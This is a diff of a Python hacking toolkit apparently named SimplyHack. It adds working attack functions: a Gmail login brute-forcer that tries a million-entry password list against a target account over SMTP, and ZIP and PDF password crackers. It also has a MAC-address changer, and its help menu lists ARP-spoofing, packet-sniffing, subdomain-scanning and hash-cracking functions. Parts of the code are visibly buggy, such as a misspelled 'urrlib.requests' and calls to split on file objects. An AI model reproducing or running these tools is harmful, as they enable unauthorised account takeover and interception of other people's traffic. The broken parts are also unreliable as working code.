@@ -1,6 +1,11 @@
 #!/usr/bin/env python3
 
-# © 2021 Abhishek Dangat, All Rights Reserved
+# Package Name             : SimplyHack
+# Version                  : 0.0.7
+# Author                   : Abhishek Dangat
+# Programming Language     : Python 3.9.7
+# Contact                  :
+# Usage                    : To create cybersecurity tools quickly and easily
 
 import subprocess
 import time
@@ -11,7 +16,11 @@ import sys
 import requests
 import hashlib
 import urllib.request
-#from socket import *
+import smtplib
+import random
+import zipfile
+import rarfile
+import pikepdf
 import scapy.all as scapy
 from colorama import Fore, Style
 from scapy.layers import http
@@ -65,28 +74,48 @@ def protocols_portNumbers(protocol):
     elif protocol == "rdp": #Remote Desktop Protocol
         return 3389
 
+#def help():
+#    print(""[subdomain scanning] - simplyhack.subdomain_scanner(domain="example.com", protocol="http/https", wordlist="default"/wordlist="wordlist.txt")
+#
+#[directory discovery] - simplyhack.directory_scanner(domain="example.com", wordlist="default"/wordlist="wordlist.txt")
+#
+#[DNS lookup] - simplyhack.dns_lookup(url="exapmle.com")
+#
+#[reverse DNS lookup] - simplyhack.reverse_dns_lookup(ip="xxx.xxx.xxx.xxx")
+#
+#[web vuln scanner] - simplyhack.web_vuln_scan(domain="http://www.example.com")
+#
+#[local network scanner] - simplyhack.local_scan(targetIP="192.168.2.1/24")
+#
+#[port vuln scanner] - simplyhack.port_vulnscan(ip="192.168.2.") DO NOT INCLUDE THE LAST DIGITS OF THE IP
+#
+#[detect network attacks] - simplyhack.detect_net_attack(interface="wlan0/eth0/etc")
+#
+#[MITM (ARP spoof)] - simplyhack.arp_spoof(routerIP="192.168.2.1", targetIP="192.168.2.201")
+#
+#[MITM (packet sniffing)] - simplyhack.sniff_packets(interface="wlan0/wlan1/eth0/etc")
+#
+#[Password cracking] - simplyhack.hash_crack(hash_type="sha1/sha224/sha256/sha512/md5", passwordHash="Your password hash here", wordlist="default(if you want to use default wordlist)" or specify path wordlist="/xxx/xxx/xxx/xxx/wordlist.txt")"")""
+
 def help():
-    print("""[subdomain scanning] - simplyhack.subdomain_scanner(domain="example.com", protocol="http/https", wordlist="some_subdomain_wordlist.txt")
+    print("\n[" + lightred + "Reconnaissance" + reset + "]")
+    print("\n[" + lightgreen + "1" + reset + "] - [" + lightgreen + "Subdomain Scanning" + reset + "] - simplyhack.subdomain_scan(" + lightgreen + "domain" + reset + "=" + lightred + '"example.com"' + reset + ", " + lightgreen + "protocol" + reset + "=" + lightred + '"http"' + reset + "/" + lightred + '"https"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + lightred + '"default"' + reset + " OR " + lightgreen + "wordlist" + reset + "=" + lightred + '"wordlist.txt"' + reset + ")")
+    print("[" + lightgreen + "2" + reset + "] - [" + lightgreen + "Directory Discovery" + reset + "] - simplyhack.directory_scan(" + lightgreen + "domain" + reset + "=" + lightred + '"example.com"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + lightred + '"default"' + reset + " OR " + lightred + '"wordlist.txt"' + reset + ")")
+    print("[" + lightgreen + "3" + reset + "] - [" + lightgreen + "DNS Lookup" + reset + "] - simplyhack.dns_lookup(" + lightgreen + "url" + reset + "=" + lightred + '"example.com"' + reset + ")")
+    print("[" + lightgreen + "4" + reset + "] - [" + lightgreen + "Reverse DNS Lookup" + reset + "] - simplyhack.reverse_dns_lookup(" + lightgreen + "ip" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
+    print("[" + lightgreen + "5" + reset + "] - [" + lightgreen + "Local Network Scanning" + reset + "] - simplyhack.local_scan(" + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
 
-[directory scanning] - simplyhack.directory_scanner(domain="example.com", wordlist="some_directory_wordlist.txt")
-
-[DNS lookup] - simplyhack.dns_lookup(url="exapmle.com")
-
-[reverse DNS lookup] - simplyhack.reverse_dns_lookup(ip="xxx.xxx.xxx.xxx")
-
-[web vuln scanner] - simplyhack.web_vuln_scan(domain="http://www.example.com")
-
-[local network scanner] - simplyhack.local_scan(targetIP="192.168.2.1/24")
-
-[port vuln scanner] - simplyhack.port_vulnscan(ip="192.168.2.") DO NOT INCLUDE THE LAST DIGITS OF THE IP
-
-[detect network attacks] - simplyhack.detect_net_attack(interface="wlan0/eth0/etc")
-
-[MITM (ARP spoof)] - simplyhack.arp_spoof(routerIP="192.168.2.1", targetIP="192.168.2.201")
-
-[MITM (packet sniffing)] - simplyhack.sniff_packets(interface="wlan0/wlan1/eth0/etc")
-
-[Password cracking] - simplyhack.hash_crack(hash_type="sha1/sha224/sha256/sha512/md5", passwordHash="Your password hash here", wordlist="default(if you want to use default wordlist)" or specify path wordlist="/xxx/xxx/xxx/xxx/wordlist.txt")""")
+    print("\n\n\n[" + lightred + "Network Attacks" + reset + " / " + lightred + "Network Defense" + reset + "]")
+    print("\n[" + lightgreen + "1" + reset + "] - [" + lightgreen + "MITM (ARP Spoofing)" + reset + "] - simplyhack.arp_spoof(" + lightgreen + "routerIP" + reset + "=" + lightred + '"<router IPv4>"' + reset + ", " + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
+    print("[" + lightgreen + "2" + reset + "] - [" + lightgreen + "MITM (Packet Sniffing)" + reset + "] - simplyhack.sniff_packets(" + lightgreen + "interface" + reset + "=" + lightred + '"<your interface>"' + reset + ")")
+    print("[" + lightgreen + "3" + reset + "] - [" + lightgreen + "Network Defense" + reset + "] - simplyhack.detect_net_attacks(" + lightgreen + "interface" + reset + "=" + lightred + '"<your interface>"' + reset + ")")
+    print("[" + lightgreen + "4" + reset + "] - [" + lightgreen + "Local Network Scanning" + reset + "] - simplyhack.local_scan(" + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
+    print("[" + lightgreen + "5" + reset + "] - [" + lightgreen + "MAC Changer" + reset + "] - simplyhack.change_mac_address(" + lightgreen + "interface" + reset + "=" + lightred + '"<Your Interface>"' + reset + ", " + lightgreen + "new_mac" + reset + "=" + lightred + '"rand OR <new MAC>"' + reset + ", " + lightgreen + "ischeck" + reset + "=" + lightred + '"TRUE/FALSE"' + reset + ")")
+    
+    print("\n\n\n[" + lightred + "Password Cracking" + reset + "]")
+    print("\n[" + lightgreen + "1" + reset + "] - [" + lightgreen + "Hash Cracker" + reset + "] - simplyhack.hash_crack(" + lightgreen + "hash_type" + reset + "=" + lightred + '"sha1/sha224/sha256/sha512/md5"' + reset + ", " + lightgreen + "passwordHash" + reset + "=" + lightred + '"<Password Hash>"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + lightred + '"default"' + reset + " OR " + lightgreen + "wordlist" + reset + "=" + lightred + '"wordlist.txt"' + reset + ")")
+    print("[" + lightgreen + "2" + reset + "] - [" + lightgreen + "Crack password protected files" + reset + "] - simplyhack.crack_passprotected(" + lightgreen + "filetype" + reset + "=" + lightred + '"<file type>"' + reset + ", " + lightgreen + "file_path" + reset + "=" + lightred + '"/xxx/xxx/xxx/file.zip/.pdf"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + lightred + '"default"' + reset + " OR " + lightgreen + "wordlist" + reset + "=" + lightred + '"wordlist.txt"' + reset + ")")
+    print("[" + lightgreen + "3" + reset + "] - [" + lightgreen + "Gmail bruteforce" + reset + "] - simplyhack.gmail_brute(" + lightgreen + "target_gmail" + reset + "=" + lightred + '"example@gmail.com"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + reset + "=" + lightred + '"default"' + reset + " OR " + lightgreen + "wordlist" + reset + "=" + lightred + '"wordlist.txt"' + reset + ")")
 
 def get_ownMAC(interface):
     IFCONFIG_SEARCH_RESULT = subprocess.check_output(["sudo", "ifconfig", interface]).decode()
@@ -114,24 +143,42 @@ def GET_HTTP_RESPONSE(domainToCheck):
     except requests.exceptions.ConnectionError:
             pass
 
-def subdomain_scanner(domain, protocol, wordlist):
-    with open(wordlist) as subdomainWordlist:
+def subdomain_scan(domain, protocol, wordlist):
+    if wordlist == "default":
+        subdomainWordlist = str(urllib.request.urlopen("https://raw.githubusercontent.com/danTaler/WordLists/master/Subdomain.txt").read(), 'utf-8')
         for singleSubdomainKeyword in subdomainWordlist:
             strippedSingleSubdomainKeyword = singleSubdomainKeyword.strip()
-            domainURL_withoutSUB = protocol + "://" + domain
-            completeURL = protocol + '://' + strippedSingleSubdomainKeyword + "." + domain
+            completeURL = protocol + "://" + strippedSingleSubdomainKeyword + "." + domain
             HTTP_RESPONSE = GET_HTTP_RESPONSE(completeURL)
             if HTTP_RESPONSE:
                 print("[" + lightgreen + "SUBDOMAIN DISCOVERED" + reset + f"] -----> {completeURL}")
+    else:
+        with open(wordlist) as subdomainWordlist:
+            for singleSubdomainKeyword in subdomainWordlist:
+                strippedSingleSubdomainKeyword = singleSubdomainKeyword.strip()
+                domainURL_withoutSUB = protocol + "://" + domain
+                completeURL = protocol + '://' + strippedSingleSubdomainKeyword + "." + domain
+                HTTP_RESPONSE = GET_HTTP_RESPONSE(completeURL)
+                if HTTP_RESPONSE:
+                    print("[" + lightgreen + "SUBDOMAIN DISCOVERED" + reset + f"] -----> {completeURL}")
 
-def directory_scanner(domain, wordlist):
-    with open(wordlist) as directoryWordlist:
+def directory_scan(domain, protocol, wordlist):
+    if wordlist == "default":
+        directoryWordlist = str(urrlib.requests.urlopen("https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/general/common.txt").read(), 'utf-8')
         for singleDirectoryKeyword in directoryWordlist:
             strippedSingleDirectoryKeyword = singleDirectoryKeyword.strip()
-            domainNameDIR = domain + "/" + strippedSingleDirectoryKeyword
-            HTTP_RESPONSE_DOMAIN    = GET_HTTP_RESPONSE(domainNameDIR)
+            domainNameDIR = protocol + "://" + domain + "/" + strippedSingleDirectoryKeyword
+            HTTP_RESPONSE_DOMAIN = GET_HTTP_RESPONSE(domainNameDIR)
             if HTTP_RESPONSE_DOMAIN:
-                print(f"[{lightgreen}DISCOVERED DIRECTORY{reset}] -----> {domainName}")
+                    print(f"[{lightgreen}DISCOVERED DIRECTORY{reset}] -----> {domainName}")
+    else:
+        with open(wordlist) as directoryWordlist:
+            for singleDirectoryKeyword in directoryWordlist:
+                strippedSingleDirectoryKeyword = singleDirectoryKeyword.strip()
+                domainNameDIR = domain + "/" + strippedSingleDirectoryKeyword
+                HTTP_RESPONSE_DOMAIN    = GET_HTTP_RESPONSE(domainNameDIR)
+                if HTTP_RESPONSE_DOMAIN:
+                    print(f"[{lightgreen}DISCOVERED DIRECTORY{reset}] -----> {domainName}")
 
 def dns_lookup(url):
     addressof_DNS_URL = socket.gethostbyname(url)
@@ -409,6 +456,78 @@ def fake_access_point(interface, fap_name):
     randomMacAddress = ["8a:2d:19:47:9a:23", "70:0c:f6:c7:c7:4d", "c0:9b:6b:01:27:d6", "32:0c:c1:fb:ba:b7", "8e:b9:92:48:16:c5", "58:7b:de:68:8c:e6", "be:e9:1c:cd:a6:bd", "28:c1:a1:aa:84:cb", "b2:65:df:d1:41:10", "86:ff:2e:9e:69:55", "e6:77:8a:1b:64:28", "40:d8:e7:d1:7a:63", "ca:f0:6a:4e:bd:32", "f4:ba:62:0b:19:35", "90:15:6e:64:85:ee", "d1:a6:55:3c:8a:c1", "28:2d:19:f6::c7:4d"]
     fakeAccessPointName = fap_name
 
+def change_mac_address(interface, new_mac, ischeck):
+    if new_mac == "rand":
+        randomMacAddress = ["8a:2d:19:47:9a:23", "70:0c:f6:c7:c7:4d", "c0:9b:6b:01:27:d6", "32:0c:c1:fb:ba:b7", "8e:b9:92:48:16:c5", "58:7b:de:68:8c:e6", "be:e9:1c:cd:a6:bd", "28:c1:a1:aa:84:cb", "b2:65:df:d1:41:10", "86:ff:2e:9e:69:55", "e6:77:8a:1b:64:28", "40:d8:e7:d1:7a:63", "ca:f0:6a:4e:bd:32", "f4:ba:62:0b:19:35", "90:15:6e:64:85:ee", "d1:a6:55:3c:8a:c1", "28:2d:19:f6::c7:4d"]
+        while True:
+            randomMAC = random.choice(randomMacAddress)
+            ifconfigRandomMacRegex = subprocess.check_output(["sudo", "ifconfig", interface])
+            regExCheckRandomMAC = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfigRandomMacRegex.decode('UTF-8'))
+            if regExCheckRandomMAC.group(0) == randomMAC:
+                time.sleep(1.5)
+                print("\n[" + lightred + "*" + reset + "] " + lightred + "The new MAC address cant be the same as the old one" + reset)
+                sys.exit()
+                #continue
+            else:
+                time.sleep(1.5)
+                print("\n[" + lightgreen + "*" + reset + "] " + lightgreen + "Process started" + reset)
+                time.sleep(1.5)
+                print("[" + lightgreen + "*" + reset + "] " + lightgreen + "Taking down the interface" + reset)
+                time.sleep(1.5)
+                subprocess.call(["sudo", "ifconfig", interface, "down"])
+                print("[" + lightgreen + "*" + reset + "] " + lightgreen + f"Changing the MAC address to {randomMAC}" + reset)
+                time.sleep(1.5)
+                subprocess.call(["sudo", "ifconfig", "wlan0", "hw", "ether", randomMAC])
+                subprocess.call(["sudo", "ifconfig", interface, "up"])
+                postProcessRandomMAC = subprocess.check_output(["sudo", "ifconfig", interface])
+                postProcessRandomMAC_RegExValidation = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", postProcessRandomMAC.decode('UTF-8'))
+                if postProcessRandomMAC_RegExValidation.group(0) == randomMAC and postProcessRandomMAC_RegExValidation.group(0) != regExCheckRandomMAC:
+                    print("[" + lightgreen + "*" + reset + "] " + lightgreen + "Process finished" + reset)
+                    time.sleep(1.5)
+                    if ischeck=="TRUE" or ischeck=="true":
+                        print("\n[" + lightgreen + "Checking if the MAC address has changed" + reset + "].....\n")
+                        time.sleep(1.5)
+                        subprocess.call(["sudo", "ifconfig", interface])
+                        return randomMAC
+                        break
+                else:
+                    print("\n[" + lightred + "*" + reset + "] " + lightred + "We ran into an unexpected error. Please try checking if the format of the MAC address is correct or try again :(" + reset)
+    elif new_mac != "rand":
+        macAddress = new_mac
+        newMAC = new_mac
+        returnDict = {"MAC":macAddress}
+        ifconfigResultsREGEX = subprocess.check_output(["sudo", "ifconfig", interface])
+        regExCheckMAC_PRE_CHANGE = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfigResultsREGEX.decode('UTF-8'))
+        if regExCheckMAC_PRE_CHANGE.group(0) == macAddress:
+            time.sleep(1.5)
+            print("\n[" + lightred + "*" + reset + "] " + lightred + "The new MAC address cant be the same as the old one" + reset)
+            sys.exit()
+        else:
+            print("\n[" + lightgreen + "*" + reset + "] " + lightgreen + "Process started" + reset)
+            time.sleep(1.5)
+            print("[" + lightgreen + "*" + reset + "] " + lightgreen + "Taking down the interface" + reset)
+            time.sleep(1.5)
+            subprocess.call(["sudo", "ifconfig", interface, "down"])
+            print("[" + lightgreen + "*" + reset + "] " + lightgreen + f"Changing the MAC address to {newMAC}" + reset)
+            time.sleep(1.5)
+            subprocess.call(["sudo", "ifconfig", "wlan0", "hw", "ether", macAddress])
+            subprocess.call(["sudo", "ifconfig", interface, "up"])
+            postProcessMAC = subprocess.check_output(["sudo", "ifconfig", interface])
+            postProcessMAC_Validation = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", postProcessMAC.decode('UTF-8'))
+            #print(postProcessMAC_Validation.group(0))
+            if postProcessMAC_Validation.group(0) == macAddress and postProcessMAC_Validation.group(0) != regExCheckMAC_PRE_CHANGE.group(0):
+                print("[" + lightgreen + "*" + reset + "] " + lightgreen + "Process finished" + reset)
+                time.sleep(1.5)
+                if ischeck=="TRUE" or ischeck=="true":
+                    print("\n[" + lightgreen + "Checking if the MAC address has changed" + reset + "].....\n")
+                    time.sleep(1.5)
+                    subprocess.call(["sudo", "ifconfig", interface])
+                    return returnDict
+                elif ischeck=="FALSE" or ischeck=="false":
+                    return returnDict
+            else:
+                print("\n[" + lightred + "*" + reset + "] " + lightred + "We ran into an unexpected error. Please try checking if the format of the MAC address is correct or try again :(" + reset)
+
 def hash_crack(hash_type, passwordHash, wordlist):
     passwordsTried = 0
     if wordlist != "default":
@@ -548,3 +667,85 @@ def hash_crack(hash_type, passwordHash, wordlist):
                     print("[" + lightred + "*" + reset + "] Tried password [" + lightred + str(singlePasswordKeyword) + reset + "] -----> " + lightred + "No match found :(" + reset)
                     passwordsTried = passwordsTried + 1
                     time.sleep(0.0000001)
+
+def gmail_brute(target_gmail, wordlist):
+    SMTP_SERVER = smtplib.SMTP("smtp.gmail.com", 587)
+    SMTP_SERVER.ehlo()
+    SMTP_SERVER.starttls()
+    if wordlist == "default":
+            wordlist = str(urllib.request.urlopen("https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt").read(), 'utf-8')
+            for singlePasswordKeyword in wordlist.split('\n'):
+                strippedSinglePasswordKeyword = singlePasswordKeyword.strip('\n')
+                try:
+                    SMTP_SERVER.login(target_gmail, strippedSinglePasswordKeyword)
+                    print("\n[" + lightgreen + "Password Found" + reset + "] - [" + lightgreen + "Gmail" + reset + f"] = {target_gmail}, [" + lightgreen + "Password" + reset + f"] = {singlePasswordKeyword}")
+                    break
+                except smtplib.SMTPAuthenticationError:
+                    print("[" + lightred + "*" + reset + "] Tried password [" + lightred + str(singlePasswordKeyword) + reset + "] -----> " + lightred + "No match found :(" + reset)
+                    time.sleep(0.01)
+    else:
+        with open(wordlist) as passwordWordlist:
+            for singlePasswordKeyword in passwordWordlist.split('\n'):
+                strippedSinglePasswordKeyword = singlePasswordKeyword.strip('\n')
+                try:
+                    SMTP_SERVER.login(target_gmail, strippedSinglePasswordKeyword)
+                    print("\n[" + lightgreen + "Password Found" + reset + "] - [" + lightgreen + "Gmail" + reset + f"] = {target_gmail}, [" + lightgreen + "Password" + reset + f"] = {singlePasswordKeyword}")
+                    break
+                except smtplib.SMTPAuthenticationError:
+                    print("[" + lightred + "*" + reset + "] Tried password [" + lightred + str(singlePasswordKeyword) + reset + "] -----> " + lightred + "No match found :(" + reset)
+                    time.sleep(0.01)
+    print("\n[" + lightred + "-" + reset + "] " + lightred + "Password not found in the wordlist" + reset)
+
+def crack_passprotected(filetype, file_path, wordlist):
+    if wordlist == "rand":
+        if filetype == "zip":
+            zipFileObject = zipfile.ZipFile(file_path)
+            wordlist = str(urllib.request.urlopen("https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt").read(), 'utf-8')
+            for singlePasswordKeyword in wordlist.split('\n'):
+                strippedSinglePasswordKeyword = singlePasswordKeyword.strip('\n').strip("\r")
+                try:
+                    zipFileObject.extractall(pwd=strippedSinglePasswordKeyword)
+                    print("\n[" + lightgreen + "Password Cracked" + reset + "] [" + lightred + "password" + reset + "] = " + str(singlePasswordKeyword))
+                except:
+                    print("[" + lightred + "*" + reset + "] Tried password [" + lightred + str(singlePasswordKeyword) + reset + "] -----> " + lightred + "No match found :(" + reset)
+                    #passwordsTried = passwordsTried + 1
+                    time.sleep(0.0000001)
+                    continue
+        elif filetype == "pdf":
+                wordlist = str(urllib.request.urlopen("https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt").read(), 'utf-8')
+                for singlePasswordKeyword in wordlist.split('\n'):
+                    strippedSinglePasswordKeyword = singlePasswordKeyword.strip('\n').strip('\r')
+                    try:
+                        with pikepdf.open(file_path, strippedSinglePasswordKeyword) as pdf:
+                            print("\n[" + lightgreen + "Password Cracked" + reset + "] [" + lightred + "password" + reset + "] = " + str(singlePasswordKeyword))
+                    except:
+                        print("[" + lightred + "*" + reset + "] Tried password [" + lightred + str(singlePasswordKeyword) + reset + "] -----> " + lightred + "No match found :(" + reset)
+                        #passwordsTried = passwordsTried + 1
+                        time.sleep(0.0000001)
+                        continue
+    elif wordlist != "rand":
+        if filetype == "zip":
+            zipFileObject = zipfile.ZipFile(file_path)
+            with open(wordlist) as wordlist:
+                for singlePasswordKeyword in wordlist.split('\n'):
+                    strippedSinglePasswordKeyword = singlePasswordKeyword.strip('\n').strip("\r")
+                    try:
+                        zipFileObject.extractall(pwd=strippedSinglePasswordKeyword)
+                        print("\n[" + lightgreen + "Password Cracked" + reset + "] [" + lightred + "password" + reset + "] = " + str(singlePasswordKeyword))
+                    except:
+                        print("[" + lightred + "*" + reset + "] Tried password [" + lightred + str(singlePasswordKeyword) + reset + "] -----> " + lightred + "No match found :(" + reset)
+                        #passwordsTried = passwordsTried + 1
+                        time.sleep(0.0000001)
+                        continue
+        elif filetype == "pdf":
+            with open(wordlist) as wordlist:
+                for singlePasswordKeyword in wordlist.split('\n'):
+                    strippedSinglePasswordKeyword = singlePasswordKeyword.strip('\n').strip('\r')
+                    try:
+                        with pikepdf.open(file_path, strippedSinglePasswordKeyword) as pdf:
+                            print("\n[" + lightgreen + "Password Cracked" + reset + "] [" + lightred + "password" + reset + "] = " + str(singlePasswordKeyword))
+                    except:
+                        print("[" + lightred + "*" + reset + "] Tried password [" + lightred + str(singlePasswordKeyword) + reset + "] -----> " + lightred + "No match found :(" + reset)
+                        #passwordsTried = passwordsTried + 1
+                        time.sleep(0.0000001)
+                        continue
